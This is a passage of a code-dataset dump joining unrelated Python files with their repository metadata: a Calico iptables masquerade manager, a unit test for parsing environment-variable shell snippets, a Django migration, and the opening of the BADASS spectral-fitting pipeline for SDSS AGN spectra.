"--jump MASQUERADE" % (MASQ_POOLS_SET_NAME,
ALL_POOLS_SET_NAME))
class MasqueradeManager(Actor):
def __init__(self, ip_type, iptables_mgr):
super(MasqueradeManager, self).__init__(qualifier=str(ip_type))
assert ip_type in (IPV4, IPV6)
assert iptables_mgr.table == "nat"
self.ip_type = ip_type
self.pools_by_id = {}
self._iptables_mgr = iptables_mgr
ip_family = "inet" if ip_type == IPV4 else "inet6"
self._all_pools_ipset = Ipset(ALL_POOLS_SET_NAME,
ALL_POOLS_SET_NAME + "-tmp",
ip_family,
"hash:net")
self._masq_pools_ipset = Ipset(MASQ_POOLS_SET_NAME,
MASQ_POOLS_SET_NAME + "-tmp",
ip_family,
"hash:net")
self._dirty = False
@actor_message()
def apply_snapshot(self, pools_by_id):
_log.info("Applying IPAM pool snapshot with %s pools",
len(pools_by_id))
self.pools_by_id.clear()
self.pools_by_id.update(pools_by_id)
self._dirty = True
@actor_message()
def on_ipam_pool_updated(self, pool_id, pool):
if self.pools_by_id.get(pool_id) != pool:
if pool is None:
_log.info("IPAM pool deleted: %s", pool_id)
del self.pools_by_id[pool_id]
else:
_log.info("IPAM pool %s updated: %s", pool_id, pool)
self.pools_by_id[pool_id] = pool
self._dirty = True
def _finish_msg_batch(self, batch, results):
_log.debug("Finishing batch of IPAM pool changes")
if self._dirty:
_log.info("Marked as dirty, looking for masq-enabled pools")
masq_enabled_cidrs = set()
all_cidrs = set()
for pool in self.pools_by_id.itervalues():
all_cidrs.add(pool["cidr"])
if pool.get("masquerade", False):
masq_enabled_cidrs.add(pool["cidr"])
if masq_enabled_cidrs:
_log.info("There are masquerade-enabled pools present. "
"Updating.")
self._all_pools_ipset.replace_members(all_cidrs)
self._masq_pools_ipset.replace_members(masq_enabled_cidrs)
# Enable masquerading for traffic coming from pools that
# have it enabled only when the traffic is heading to an IP
# that isn't in any Calico-owned pool. (We assume that NAT
# is not required for Calico-owned IPs.)
self._iptables_mgr.ensure_rule_inserted(MASQ_RULE_FRAGMENT,
async=True)
else:
_log.info("No masquerade-enabled pools present. "
"Removing rules and ipsets.")
# We can only have programmed the rule if the ipsets are
# present. If they're not present, iptables rejects the
# delete with an error that IptablesUpdater doesn't expect.
if (self._all_pools_ipset.exists() and
self._masq_pools_ipset.exists()):
# Have to make a blocking call so that we don't try to
# remove the ipsets before we've cleaned up the rule that
# references them.
self._iptables_mgr.ensure_rule_removed(MASQ_RULE_FRAGMENT,
async=False)
# Safe to call even if the ipsets don't exist:
self._all_pools_ipset.delete()
self._masq_pools_ipset.delete()
self._dirty = False
_log.info("Finished refreshing ipsets")
| 45.653061
| 78
| 0.55342
|
70051a80a6fe715d06d72097c84ac89cd03e85c7
| 6,384
|
py
|
Python
|
tests/lib/bes/env/test_env_dir.py
|
reconstruir/bes
|
82ff54b2dadcaef6849d7de424787f1dedace85c
|
[
"Apache-2.0"
] | null | null | null |
tests/lib/bes/env/test_env_dir.py
|
reconstruir/bes
|
82ff54b2dadcaef6849d7de424787f1dedace85c
|
[
"Apache-2.0"
] | null | null | null |
tests/lib/bes/env/test_env_dir.py
|
reconstruir/bes
|
82ff54b2dadcaef6849d7de424787f1dedace85c
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
#-*- coding:utf-8; mode:python; indent-tabs-mode: nil; c-basic-offset: 2; tab-width: 2 -*-
import copy, os, os.path as path
from bes.testing.unit_test import unit_test
from bes.system.os_env import os_env
from bes.system.env_override import env_override
from bes.fs.file_util import file_util
from bes.fs.temp_file import temp_file
from bes.fs.testing.temp_content import temp_content
from bes.env.env_dir import env_dir
from bes.env.env_dir import action
class test_env_dir(unit_test):
_TEST_ITEMS = [
'file 1.sh "export A=1\n" 644',
'file 2.sh "export B=2\n" 644',
'file 3.sh "export C=3\n" 644',
'file 4.sh "export D=4\n" 644',
'file 5.sh "export E=5\n" 644',
'file 6.sh "unset F\n" 644',
]
def test_files(self):
ed = self._make_temp_env_dir(self._TEST_ITEMS)
self.assertEqual( [ '1.sh', '2.sh', '3.sh', '4.sh', '5.sh', '6.sh' ], ed.files )
def test_files_explicit(self):
ed = self._make_temp_env_dir(self._TEST_ITEMS, files = [ '1.sh', '3.sh', '5.sh' ])
self.assertEqual( [ '1.sh', '3.sh', '5.sh' ], ed.files )
def test_files_not_found(self):
with self.assertRaises(IOError) as ctx:
self._make_temp_env_dir(self._TEST_ITEMS, files = [ 'notthere.sh' ])
def test_instructions_set(self):
ed = self._make_temp_env_dir([
'file 1.sh "export FOO=1\n" 644',
])
env = {}
self.assertEqual( [
( 'FOO', '1', action.SET ),
], ed.instructions({}) )
def test_instructions_path_prepend(self):
ed = self._make_temp_env_dir([
'file 1.sh "export PATH=/foo/bin:$PATH\n" 644',
])
env = {
'PATH': '/usr/bin:/bin',
}
self.assertEqual( [
( 'PATH', '/foo/bin', action.PATH_PREPEND ),
], ed.instructions(env) )
def test_instructions_path_append(self):
ed = self._make_temp_env_dir([
'file 1.sh "export PATH=$PATH:/foo/bin\n" 644',
])
env = {
'PATH': '/usr/bin:/bin',
}
self.assertEqual( [
( 'PATH', '/foo/bin', action.PATH_APPEND ),
], ed.instructions(env) )
def test_instructions_path_remove(self):
ed = self._make_temp_env_dir([
'file 1.sh "export PATH=/usr/bin:/bin\n" 644',
])
env = {
'PATH': '/usr/bin:/my/path:/bin',
}
self.assertEqual( [
( 'PATH', '/my/path', action.PATH_REMOVE ),
], ed.instructions(env) )
def test_foo(self):
env = {
'SOMETHINGIMADEUP': 'GOOD',
'PATH': '/bin:/usr/bin:/my/path:/sbin'
}
with env_override(env = env) as tmp_env:
tmp_dir = self.make_temp_dir()
temp_content.write_items([
'file 1.sh "export PATH=/bin:/usr/bin:/sbin\n" 644',
'file 2.sh "export BAR=orange\n" 644',
'file 3.sh "export PATH=/a/bin:$PATH\nexport PATH=/b/bin:$PATH\n" 644',
'file 4.sh "export FOO=kiwi\n" 644',
'file 5.sh "export PATH=$PATH:/x/bin\nPATH=$PATH:/y/bin\n" 644',
'file 6.sh "unset SOMETHINGIMADEUP\n" 644',
], tmp_dir)
ed = env_dir(tmp_dir)
self.assertEqual( [ '1.sh', '2.sh', '3.sh', '4.sh', '5.sh', '6.sh' ], ed.files )
self.assertEqual( [
( 'BAR', 'orange', action.SET ),
( 'FOO', 'kiwi', action.SET ),
( 'PATH', '/a/bin', action.PATH_PREPEND ),
( 'PATH', '/b/bin', action.PATH_PREPEND ),
( 'PATH', '/my/path', action.PATH_REMOVE ),
( 'PATH', '/x/bin', action.PATH_APPEND ),
( 'PATH', '/y/bin', action.PATH_APPEND ),
( 'SOMETHINGIMADEUP', None, action.UNSET ),
], ed.instructions(tmp_env.to_dict()) )
# self.assertEqual( {
# 'BAR': 'orange',
# 'FOO': 'kiwi',
# 'PATH': '/b/bin:/a/bin:/x/bin:/y/bin',
# }, ed.transform_env({}) )
# self.assertEqual( {
# 'BAR': 'orange',
# 'FOO': 'kiwi',
# 'PATH': '/b/bin:/a/bin:/x/bin:/y/bin',
# }, ed.transform_env({ 'SOMETHINGIMADEUP': 'yes' }) )
#
# self.assertEqual( {
# 'BAR': 'orange',
# 'FOO': 'kiwi',
# 'PATH': '/b/bin:/a/bin:/usr/local/bin:/usr/foo/bin:/x/bin:/y/bin',
# }, ed.transform_env({ 'PATH': '/usr/local/bin:/usr/foo/bin' }) )
def _make_temp_env_dir(self, items, files = None):
tmp_dir = self.make_temp_dir()
temp_content.write_items(items, tmp_dir)
return env_dir(tmp_dir, files = files)
def test_transform_env_empty(self):
current_env = {}
current_env_save = copy.deepcopy(current_env)
ed = self._make_temp_env_dir([])
transformed_env = ed.transform_env(current_env)
self.assertEqual( current_env_save, current_env )
expected = {
}
self.assert_dict_as_text_equal( expected, transformed_env )
def test_transform_env_append(self):
current_env = {
'PYTHONPATH': '/p/lib/python',
'PATH': '/p/bin',
}
current_env_save = copy.deepcopy(current_env)
ed = self._make_temp_env_dir([
'file 1.sh "export PATH=$PATH:/foo/bin\n" 644',
'file 2.sh "export PYTHONPATH=$PYTHONPATH:/foo/lib/python\n" 644',
])
transformed_env = ed.transform_env(current_env)
self.assertEqual( current_env_save, current_env )
expected = {
'PATH': '/p/bin:/foo/bin',
'PYTHONPATH': '/p/lib/python:/foo/lib/python',
}
self.assert_dict_as_text_equal( expected, transformed_env )
def test_transform_env_set(self):
current_env = {}
ed = self._make_temp_env_dir([
'file 1.sh "export PATH=$PATH:/foo/bin\n" 644',
'file 2.sh "export PYTHONPATH=$PYTHONPATH:/foo/lib/python\n" 644',
'file 3.sh "export %s=$%s:/foo/lib\n" 644' % (os_env.LD_LIBRARY_PATH_VAR_NAME,
os_env.LD_LIBRARY_PATH_VAR_NAME),
])
transformed_env = ed.transform_env(current_env)
default_PATH = os_env.default_system_value('PATH')
self.assertEqual( {
'PATH': '%s:/foo/bin' % (default_PATH),
'PYTHONPATH': ':/foo/lib/python',
os_env.LD_LIBRARY_PATH_VAR_NAME: ':/foo/lib',
}, transformed_env )
def test_transform_env_unset(self):
current_env = {}
ed = self._make_temp_env_dir([
'file 1.sh "export FOO=foo\n" 644',
'file 2.sh "export BAR=bar\n" 644',
'file 3.sh "unset FOO\n" 644',
])
transformed_env = ed.transform_env(current_env)
self.assertEqual( {
'BAR': 'bar',
}, transformed_env )
if __name__ == '__main__':
unit_test.main()
| 33.957447
| 90
| 0.597901
|
e3efff21bbc524059fb54383569b88071d6cca1f
| 85
|
py
|
Python
|
foo_package/private_module.py
|
peter-stoyanov/Python
|
52ddb70537c05caa0d87740493b7b1f974191984
|
[
"MIT"
] | null | null | null |
foo_package/private_module.py
|
peter-stoyanov/Python
|
52ddb70537c05caa0d87740493b7b1f974191984
|
[
"MIT"
] | null | null | null |
foo_package/private_module.py
|
peter-stoyanov/Python
|
52ddb70537c05caa0d87740493b7b1f974191984
|
[
"MIT"
] | null | null | null |
"""Doc"""
def privateDoSmth():
"""Doc"""
if __name__ == '__main__':
main()
| 10.625
| 26
| 0.517647
|
8234be1c19c6ebcd79e07a92d9101d86f3ebc14c
| 415
|
py
|
Python
|
orm/migrations/0004_auto_20180903_0140.py
|
chateval/chatevalv2
|
7ba96d81842db00427a6d6351d5cea76a8766450
|
[
"Apache-2.0"
] | 5
|
2018-06-11T19:47:23.000Z
|
2020-03-04T01:29:15.000Z
|
orm/migrations/0004_auto_20180903_0140.py
|
chateval/app
|
7ba96d81842db00427a6d6351d5cea76a8766450
|
[
"Apache-2.0"
] | 12
|
2018-07-11T18:50:13.000Z
|
2022-02-10T10:45:58.000Z
|
orm/migrations/0004_auto_20180903_0140.py
|
chateval/app
|
7ba96d81842db00427a6d6351d5cea76a8766450
|
[
"Apache-2.0"
] | 1
|
2018-06-29T14:52:16.000Z
|
2018-06-29T14:52:16.000Z
|
# Generated by Django 2.0.7 on 2018-09-03 01:40
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('orm', '0003_auto_20180903_0136'),
]
operations = [
migrations.AlterField(
model_name='evaluationdataset',
name='baselines',
field=models.ManyToManyField(blank=True, to='orm.Model'),
),
]
| 21.842105
| 69
| 0.612048
|
845945d70de95927130daf2672c055b3430ed8b2
| 553,648
|
py
|
Python
|
badass.py
|
remingtonsexton/BADASS
|
905e03c57ece61f11db81544bb7b9167f831c08c
|
[
"MIT"
] | null | null | null |
badass.py
|
remingtonsexton/BADASS
|
905e03c57ece61f11db81544bb7b9167f831c08c
|
[
"MIT"
] | null | null | null |
badass.py
|
remingtonsexton/BADASS
|
905e03c57ece61f11db81544bb7b9167f831c08c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""Bayesian AGN Decomposition Analysis for SDSS Spectra (BADASS3)
BADASS is an open-source spectral analysis tool designed for detailed decomposition
of Sloan Digital Sky Survey (SDSS) spectra, and specifically designed for the
fitting of Type 1 ("broad line") Active Galactic Nuclei (AGN) in the optical.
The fitting process utilizes the Bayesian affine-invariant Markov-Chain Monte
Carlo sampler emcee for robust parameter and uncertainty estimation, as well
as autocorrelation analysis to access parameter chain convergence.
"""
import numpy as np
from numpy.polynomial import hermite
from numpy import linspace, meshgrid
import scipy.optimize as op
import pandas as pd
import numexpr as ne
import matplotlib.pyplot as plt
from matplotlib import cm
import matplotlib.gridspec as gridspec
from scipy import optimize, linalg, special, fftpack
from scipy.interpolate import griddata, interp1d
from scipy.stats import f, chisquare
from scipy import stats
import scipy
from scipy.integrate import simps
from astropy.io import fits
import glob
import time
import datetime
from os import path
import os
import shutil
import sys
from astropy.stats import mad_std
from scipy.special import wofz
import emcee
from astroquery.irsa_dust import IrsaDust
import astropy.units as u
from astropy import coordinates
from astropy.cosmology import FlatLambdaCDM
import re
import natsort
import copy
# import StringIO
import psutil
import pathlib
import importlib
import multiprocessing as mp
import bifrost
import spectres
# Import BADASS tools modules
cwd = os.getcwd() # get current working directory
sys.path.insert(1,cwd+'/badass_tools/')
import badass_utils as badass_utils
plt.style.use('dark_background') # For cool tron-style dark plots
import matplotlib
matplotlib.rcParams['agg.path.chunksize'] = 100000
import warnings
warnings.filterwarnings("ignore", category=RuntimeWarning)
warnings.filterwarnings("ignore", category=UserWarning)
__author__ = "Remington O. Sexton (GMU/USNO), Sara M. Doan (GMU), Michael A. Reefe (GMU), William Matzko (GMU), Nicholas Darden (UCR)"
__copyright__ = "Copyright (c) 2021 Remington Oliver Sexton"
__credits__ = ["Remington O. Sexton (GMU/USNO)", "Sara M. Doan (GMU)", "Michael A. Reefe (GMU)", "William Matzko (GMU)", "Nicholas Darden (UCR)"]
__license__ = "MIT"
__version__ = "9.1.6"
__maintainer__ = "Remington O. Sexton"
__email__ = "rsexton2@gmu.edu"
__status__ = "Release"
##########################################################################################################
# Note: Minor tweaks needed to port Python 2 version of BADASS into Python 3 (thanks to W. Matzko).
# - First, I had to set dtype = [("fluxes",dict)]. Without the brackets [], you get the error
# TypeError: data type "fluxes" not understood. Adding the additional brackets causes subsequent
# results to be returned in brackets. To that end, I needed to make the following changes in the
# flux_plots() function:
# ~line 5180: for key in flux_blob[0][0]: --> for key in flux_blob[0][0][0]:
# ~line 5196: same change as above
# ~line 5200: flux_dict[key]['chain'][j,i] = flux_blob[i][j[key] --> flux_dict[key]['chain'][j,i] = flux_blob[i][j][0][key]
# Comment out "import StringIO" (not needed)
# TypeError, " " -> TypeError(" ")
##########################################################################################################
# Revision History
# Versions 1-5
# - Very unstable, lots of bugs, kinda messy, not many options or features. We've made a lot of front- and back-end changes and improvements.
# - Versions 1-4 were not very flexible, and were originally optimized for Keck LRIS spectra (See
# [Sexton et al. (2019)](https://ui.adsabs.harvard.edu/abs/2019ApJ...878..101S/abstract)) and then optimized for large samples of SDSS spectra.
# - In Version 5 we performed a complete overhaul with more options, features. The most improved-upon feature was the addition of autocorrelation
# analysis for parameter chain convergence, which now produces the most robust estimates.
# Version 6
# - Improved autocorrelation analysis and options. One can now choose the number of autocorrelation times and tolerance for convergence.
# Posterior sampling now restarts if solution jumps prematurely out of convergence.
# - Simplified the Jupyter Notebook control panel and layout. Most of the BADASS machinery is now contained in the badass_v6_0.py file.
# - Output of black hole mass based on availability of broad line (based on Woo et al. (2015) (https://ui.adsabs.harvard.edu/abs/2015ApJ...801...38W/abstract)
# H-alpha BH mass estimate, and Sexton et al. (2019) (https://ui.adsabs.harvard.edu/abs/2019ApJ...878..101S/abstract) H-beta BH mass estimate.
# - Output of systemic stellar velocity (redshift) and it's uncertainty.
# - Output of BPT diagnostic ratios and plot if both H$\alpha$ and H$\beta$ regions are fit simultaneously.
# - Minor memory leak improvements by optimizing plotting functions and deleting large arrays from memory via garbage collection.
# - Fixed issues with the outflow test function
# - Added minimum S/N option for fitting the LOSVD
# - MCMC fitting with emcee is now optional with `mcmc_fit`; one can fit using only Monte Carlo bootstrapping with any number of `max_like_niter` iterations
# to estimate uncertainties if one does not require a fit of the LOSVD. If you need LOSVD measurements, you still must (and *should*) use emcee.
# - One can now perform more than a single maximum likelihood fit for intial parameter values for emcee by changing `max_like_niter`, be advised this will
# take longer for large regions of spectra, but generally produces better initial parameter values.
# - BPT diagnostic classification includes the classic Kewley+01 & Kauffmann+03 diagram to separate starforming from AGN dominated objects, but also the [SII]
# diagnostic to distinguish Seyferts from LINERs. The BPT classification is now written to the log file.
# - Store autocorrelation times and tolerances for each parameter in a dictionary and save to a `.npy` file
# - Cleaned up Notebook
# - Major changes and improvements in how monte carlo bootstrapping is performed for maximum likelihood and outflow testing functions.
# Version 7.0.0
# - Added minimum width for emission lines which improves outflow testing; this is based on the dispersion element of a single noise spike.
# - Emission lines widths are now measured as Gaussian dispersion (disp) instead of Gaussian FWHM (fwhm).
# - Added warning flags to best fit parameter files and logfile if parameters are consistent with lower or upper limits to within 1-sigma.
# - While is is *not recommended*, one can now test for outflows in the H-alpha/[NII] region independently of the H-beta/[OIII] region, as well as
# fit for outflows in this region. However, if the region includes H-beta/[OIII], then the default constraint is to still use [OIII]5007 to constrain
# outflow amplitude, dispersion, and velocity offset.
# - Plotting options, as well as corner plot added (defualt is *not* to output this file because there is lots of overhead)
# - More stable outflow testing and maximum likelihood estimation
# Version 7.1.0
# - Fixed a critical bug in resolution correction for emission lines
# - misc. bug fixes
# Version 7.2.0
# - Feature additions; one can suppress print output completely for use when
# running multiprocessing pool
# Version 7.3.0
# - Feature additions; Jupyter Notebook now supports multiprocessing in place
# of for loops which do not release memory.
# - Outflow test options; outflow fitting no longer constrains velocity offset
# to be less than core (blueshifted), and now only tests for blueshifts if
# option is selected. Only amplitude and FHWM are constrained.
# - Better outflow testing; test now compare outflow to no-outflow models
# to check if there is significant improvement in residuals, as well as flags
# models in which the bounds are reached and good fits cannot be determined.
# Version 7.3.1-7.3.3
# - bug fixes.
# Version 7.4.0
# - changes to how outflow tests are performed; different residual improvement metric.
# - new default host galaxy template for non-LOSVD fitting; using MILES 10.0 Gyr SSP
# with a dispersion of 100 km/s that better matches absorption features.
# Version 7.4.1-7.4.3
# - writing outflow test metrics to log file for post-fit analysis
# - Improved outflow/max-likelihood fitting using scipy.optimize.basinhopping.
# While basinhopping algorithm requires more runtime, it produces a significantly
# better fit, namely for the power-law slope parameter which never varies with
# the SLSQP algorithm due to the fact that it is stuck in a local minima.
# - Added F-statistic (ratio of variances between no outflow and outflow model)
# - Changed default outflow statistic settings
# - Bug fixes; fixed problems with parameters in 'list' option conv_type getting
# removed. Now if a user-defined parameter in conv_type is wrong or removed,
# it uses the remaining valid parameters for convergence, or defaults to 'median'.
# Version 7.5.0 - 7.5.3
# - test outflow residual statistic replaced with f-statistic (ratio-of-variances)
# to compare model residuals.
# - added interpolation of bad pixels based on SDSS flagged pixels.
# - bug fixes
# Version 7.6.0 - 7.6.8
# - Writing no-outflow parameters from test_outflows run to log file
# - bug fixes
# Version 7.7.0
# - NLS1 support; more detailed option for FeII template fitting (fwhm and voff
# fitting options); Lorentzian emission line profile option.
# - Kovacevic et al. 2010 FeII template added, which includes a paramter for
# - temperature.
# - Relaxed wavelength requirement for outflow tests for higher-redshift targets
# Version 7.7.1 (MNRAS Publication Version)
# - Added statistical F-test for ascertaining confidence between single-Gaussian
# and double-Gaussian models for the outflow test. Removed the ratio-of-variance
# test and replaced it with a sum-of-squares of residuals ratio.
# - Added "n_basinhop" to fit_options, which allows user to choose how many initial
# basinhopping success iterations before a solution is achieved. This can
# drastically reduce the basinhopping fit time, at the expense of fit quality.
# - Bug fixes.
# Version 7.7.2 - 7.7.6
# - Fixed problem with FeII emission lines at the edge of the fitting region
# This is done by setting the variable edge_pad=0.
# - Fixed F-test NaN confidence bug
# - Updated initial fitting parameters in Jupyter notebook
# - Bug fixes and fixes to plots
# Version 8.0.0 - 8.0.13 major updates
# - Added smoothly broken power-law spectrum for high-z objects
# - Optimized FeII template fitting by utilizing PPXF framework
# - Added UV FeII+FeIII template from Vestergaard & Wilkes (2001)
# - Added Balmer continuum component
# - Added equivalent width calculations
# - Added additional chisquared fit statistic for outflow test
# - Voigt and Gauss-Hermite line profile options, with
# any number of higher order moments
# - Emission line list options (default and user-specified)
# - Control over soft- and hard constraints
# - Option for non-SDSS spectrum input
# - interpolation over metal absorption lines
# - masking of bad pixels, strong emission+absorption lines (automated), and user-defined masks
# - Various bug fixes, plotting improvements
# - new hypothesis testing for lines and outflows (F-test remains unchanged)
# - Continuum luminosities at 1350 Å, 3000 Å, and 5100 Å.
# - pathlib support
# - corner plots (corner.py) no longer supported; user should make their own corner plots with fewer free parameters
# - removed BPT diagram function; user should make BPT diagrams post processing.
# Version 8.0.14 - 8.0.15
# - Regular expressions now supported for soft constraints
# - IFU support for MANGA and MUSE (General) datasets
# Version 9.0.0 - 9.1.1
# - options for likelihood function
# - consolidated outflow and line testing routines
# Version 9.1.6
# - polynomial continuum components independent from LOSVD component.
# - linearization of non-linearized non-SDSS spectra using spectres module
##########################################################################################################
#### Run BADASS ##################################################################
def run_BADASS(data,
nobj=None,
nprocesses=None,
options_file=None,
dust_cache=None,
fit_options=False,
mcmc_options=False,
comp_options=False,
user_lines=None,
user_constraints=None,
user_mask=None,
combined_lines={},
losvd_options=False,
host_options=False,
power_options=False,
poly_options=False,
opt_feii_options=False,
uv_iron_options=False,
balmer_options=False,
outflow_test_options=False,
plot_options=False,
output_options=False,
sdss_spec=True,
ifu_spec=False,
spec=None,
wave=None,
err=None,
fwhm=None,
z=None,
ebv=None,
):
"""
The top-level BADASS function that handles the multiprocessing workers making calls to run_single_thread
"""
# Determine the number of processes based on CPU count, if unspecified
if nprocesses is None:
nprocesses = int(np.ceil(mp.cpu_count()/2))
if os.path.isdir(data):
# Get locations of sub-directories for each fit within the parent data directory
spec_loc = natsort.natsorted(glob.glob(os.path.join(data, '*')))
if nobj is not None:
spec_loc = spec_loc[nobj[0]:nobj[1]]
work_dirs = [si + os.sep for si in spec_loc]
print(f"Fitting {len(spec_loc)} 1D spectra")
# Print memory of the python process at the start
process = psutil.Process(os.getpid())
print(f"Start process memory: {process.memory_info().rss/1e9:<30.8f}")
files = [glob.glob(os.path.join(wd, '*.fits'))[0] for wd in work_dirs]
arguments = [(pathlib.Path(file), options_file, dust_cache, fit_options, mcmc_options, comp_options, user_lines, user_constraints, user_mask,
combined_lines, losvd_options, host_options, power_options, poly_options, opt_feii_options, uv_iron_options, balmer_options,
outflow_test_options, plot_options, output_options, sdss_spec, ifu_spec, spec, wave, err, fwhm, z, ebv) for file in files]
# map arguments to function
if len(files) > 1:
pool = mp.Pool(processes=nprocesses, maxtasksperchild=1)
pool.starmap(run_single_thread, arguments, chunksize=1)
pool.close()
pool.join()
else:
run_single_thread(*arguments[0])
elif os.path.isfile(data):
# Print memory of the python process at the start
process = psutil.Process(os.getpid())
print(f"Start process memory: {process.memory_info().rss/1e9:<30.8f}")
run_single_thread(pathlib.Path(data), options_file, dust_cache, fit_options, mcmc_options, comp_options,
user_lines, user_constraints, user_mask, combined_lines, losvd_options, host_options, power_options, poly_options,
opt_feii_options, uv_iron_options, balmer_options, outflow_test_options, plot_options, output_options,
sdss_spec, ifu_spec, spec, wave, err, fwhm, z, ebv)
# Print memory at the end
print(f"End process memory: {process.memory_info().rss / 1e9:<30.8f}")
def run_single_thread(fits_file,
options_file = None,
dust_cache=None,
fit_options=False,
mcmc_options=False,
comp_options=False,
user_lines=None,
user_constraints=None,
user_mask=None,
combined_lines={},
losvd_options=False,
host_options=False,
power_options=False,
poly_options=False,
opt_feii_options=False,
uv_iron_options=False,
balmer_options=False,
outflow_test_options=False,
plot_options=False,
output_options=False,
sdss_spec =True,
ifu_spec =False,
spec = None,
wave = None,
err = None,
fwhm = None,
z = None,
ebv = None,
):
"""
This is the main function calls all other sub-functions in order.
"""
if dust_cache != None:
IrsaDust.cache_location = str(dust_cache)
# Import options if options_file given
if options_file is not None:
try:
opt_file = pathlib.Path(options_file)
if not opt_file.exists():
raise ValueError("\n Options file not found!\n")
sys.path.append(str(opt_file.parent))
options = importlib.import_module(opt_file.stem)
# print("\n Successfully imported options file!\n")
if hasattr(options,"fit_options"):
fit_options = options.fit_options
if hasattr(options,"comp_options"):
comp_options = options.comp_options
if hasattr(options,"mcmc_options"):
mcmc_options = options.mcmc_options
if hasattr(options,"user_lines"):
user_lines = options.user_lines
if hasattr(options,"user_constraints"):
user_constraints = options.user_constraints
if hasattr(options,"user_mask"):
user_mask = options.user_mask
if hasattr(options,"losvd_options"):
losvd_options = options.losvd_options
if hasattr(options,"host_options"):
host_options = options.host_options
if hasattr(options,"power_options"):
power_options = options.power_options
if hasattr(options,"poly_options"):
poly_options = options.poly_options
if hasattr(options,"opt_feii_options"):
opt_feii_options = options.opt_feii_options
if hasattr(options,"uv_iron_options"):
uv_iron_options = options.uv_iron_options
if hasattr(options,"balmer_options"):
balmer_options = options.balmer_options
if hasattr(options,"plot_options"):
plot_options = options.plot_options
if hasattr(options,"output_options"):
output_options = options.output_options
if hasattr(options,"line_list"):
user_lines = options.user_lines
if hasattr(options,"soft_cons"):
user_constraints = options.user_constraints
if hasattr(options,"combined_lines"):
combined_lines = options.combined_lines
except ImportError:
print("\n Error in importing options file! Options file must be a .py file!\n ")
# Check inputs; raises exception if user input is invalid.
fit_options = badass_utils.check_fit_options(fit_options,comp_options)
comp_options = badass_utils.check_comp_options(comp_options)
mcmc_options = badass_utils.check_mcmc_options(mcmc_options)
user_lines = badass_utils.check_user_lines(user_lines)
user_constraints = badass_utils.check_user_constraints(user_constraints)
user_mask = badass_utils.check_user_mask(user_mask)
losvd_options = badass_utils.check_losvd_options(losvd_options)
host_options = badass_utils.check_host_options(host_options)
power_options = badass_utils.check_power_options(power_options)
poly_options = badass_utils.check_poly_options(poly_options)
opt_feii_options = badass_utils.check_opt_feii_options(opt_feii_options)
uv_iron_options = badass_utils.check_uv_iron_options(uv_iron_options)
balmer_options = badass_utils.check_balmer_options(balmer_options)
plot_options = badass_utils.check_plot_options(plot_options)
output_options = badass_utils.check_output_options(output_options)
verbose = output_options["verbose"]
# Check user input spectrum if sdss_spec=False
if (not sdss_spec) and (not ifu_spec):
# If user does not provide a error spectrum one will be provided for them!
if err is None:
err = np.abs(0.1*spec)
spec, wave, err, fwhm, z, ebv = badass_utils.check_user_input_spec(spec,wave,err,fwhm,z,ebv)
# Unpack input
# fit_options
fit_reg = fit_options["fit_reg"]
good_thresh = fit_options["good_thresh"]
mask_bad_pix = fit_options["mask_bad_pix"]
mask_emline = fit_options["mask_emline"]
mask_metal = fit_options["mask_metal"]
fit_stat = fit_options["fit_stat"]
n_basinhop = fit_options["n_basinhop"]
test_outflows = fit_options["test_outflows"]
test_line = fit_options["test_line"]
max_like_niter = fit_options["max_like_niter"]
output_pars = fit_options["output_pars"]
cosmology = fit_options["cosmology"]
# mcmc_options
mcmc_fit = mcmc_options["mcmc_fit"]
nwalkers = mcmc_options["nwalkers"]
auto_stop = mcmc_options["auto_stop"]
conv_type = mcmc_options["conv_type"]
min_samp = mcmc_options["min_samp"]
ncor_times = mcmc_options["ncor_times"]
autocorr_tol = mcmc_options["autocorr_tol"]
write_iter = mcmc_options["write_iter"]
write_thresh = mcmc_options["write_thresh"]
burn_in = mcmc_options["burn_in"]
min_iter = mcmc_options["min_iter"]
max_iter = mcmc_options["max_iter"]
# comp_options
fit_opt_feii = comp_options["fit_opt_feii"]
fit_uv_iron = comp_options["fit_uv_iron"]
fit_balmer = comp_options["fit_balmer"]
fit_losvd = comp_options["fit_losvd"]
fit_host = comp_options["fit_host"]
fit_power = comp_options["fit_power"]
fit_poly = comp_options["fit_poly"]
fit_narrow = comp_options["fit_narrow"]
fit_broad = comp_options["fit_broad"]
fit_outflow = comp_options["fit_outflow"]
fit_absorp = comp_options["fit_absorp"]
tie_line_fwhm = comp_options["tie_line_fwhm"]
tie_line_voff = comp_options["tie_line_voff"]
n_moments = comp_options["n_moments"]
# plot_options
plot_param_hist = plot_options["plot_param_hist"]
plot_flux_hist = plot_options["plot_flux_hist"]
plot_lum_hist = plot_options["plot_lum_hist"]
plot_eqwidth_hist = plot_options["plot_eqwidth_hist"]
plot_HTML = plot_options["plot_HTML"]
# Set up run ('MCMC_output_#') directory
work_dir = os.path.dirname(fits_file)+"/"
run_dir,prev_dir = setup_dirs(work_dir,output_options['verbose'])
run_dir = pathlib.Path(run_dir)
# Check to make sure plotly is installed for HTML interactive plots:
if plot_HTML==True:
if importlib.util.find_spec('plotly'):
pass
else: plot_HTML=False
# output_options
write_chain = output_options["write_chain"]
verbose = output_options["verbose"]
#
# Start fitting process
print('\n > Starting fit for %s' % fits_file.parent.name)
sys.stdout.flush()
# Start a timer to record the total runtime
start_time = time.time()
#
# Determine validity of fitting region
min_fit_reg = 25 # in Å; set the minimum fitting region size here
if (sdss_spec) or (ifu_spec): # if user-input spectrum is an SDSS spectrum
#
fit_reg,good_frac = determine_fit_reg_sdss(fits_file, run_dir, fit_reg, good_thresh, fit_losvd, losvd_options, verbose)
if (fit_reg is None) or ((fit_reg[1]-fit_reg[0]) < min_fit_reg):
print('\n Fitting region too small! The fitting region must be at least %d A! Moving to next object... \n' % (min_fit_reg))
cleanup(run_dir)
return None
elif (good_frac < fit_options["good_thresh"]) and (fit_reg is not None): # if fraction of good pixels is less than good_threshold, then move to next object
print('\n Not enough good channels above threshold! Moving onto next object...')
cleanup(run_dir)
return None
elif (good_frac >= fit_options["good_thresh"]) and (fit_reg is not None):
pass
elif (not sdss_spec): # if user-input spectrum is not an SDSS spectrum
fit_reg,good_frac = determine_fit_reg_user(wave, z, run_dir, fit_reg, good_thresh, fit_losvd, losvd_options, verbose)
if (fit_reg is None) or ((fit_reg[1]-fit_reg[0]) < min_fit_reg):
print('\n Fitting region too small! The fitting region must be at least %d A! Moving to next object... \n' % (min_fit_reg))
cleanup(run_dir)
return None
elif (fit_reg is not None):
pass
